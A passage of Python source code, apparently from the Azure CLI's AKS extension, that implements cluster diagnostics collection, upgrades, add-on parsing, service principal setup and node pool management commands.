path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
    # str.index would raise ValueError when "-hcp-" is absent; use find so the
    # -1 fallback below is actually reachable.
    len_of_container_name = normalized_container_name.find("-hcp-")
    if len_of_container_name == -1:
        len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
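    # Illustrative (FQDN hypothetical): "myaks-dns-a1b2c3.hcp.eastus.azmk8s.io" is
    # normalized to "myaks-dns-a1b2c3-hcp-eastus-azmk8s-io" and truncated at the
    # "-hcp-" marker, giving the container name "myaks-dns-a1b2c3".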
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace("# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(curr_dir, "deploymentyaml", "aks-periscope.yaml")
    with open(periscope_yaml_file, "r") as yaml_file:
        data_loaded = yaml_file.read()
    return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the nodepool name or use the "az aks nodepool" command to scale a node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This only provides client-side convenience so customers can run "az aks upgrade" to upgrade all
        # nodepools of a cluster. The SDK only supports upgrading a single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. A node image only upgrade '
                               'can only be applied to VirtualMachineScaleSets clusters.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
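# A sketch of the parser above (values hypothetical): addons_str "monitoring,azure-policy"
# produces two ManagedClusterAddonProfile entries, keyed by CONST_MONITORING_ADDON_NAME
# (with the workspace resource id in its config) and CONST_AZURE_POLICY_ADDON_NAME; an
# unrecognized leftover such as "foo" raises
# CLIError('"foo" is not recognized by the --enable-addons argument.').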
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError(
                'Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
        if min_count is not None or max_count is not None:
            raise CLIError(
                'min-count and max-count can only be used together with --enable-cluster-autoscaler, please specify the flag')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
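# Illustrative (value hypothetical): os.urandom(10) hex-encodes to 20 characters, so a
# generated secret looks like "3f9c0d7a1b2e4f5a6c7d$" -- 21 characters ending in "$"
# to satisfy AAD's special-character requirement.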
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
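        # Illustrative: the CLI default for spot_max_price is NaN, which is translated
        # to -1 here; for AKS spot pools a max price of -1 means "pay up to the current
        # on-demand price" instead of capping at a fixed amount.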
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
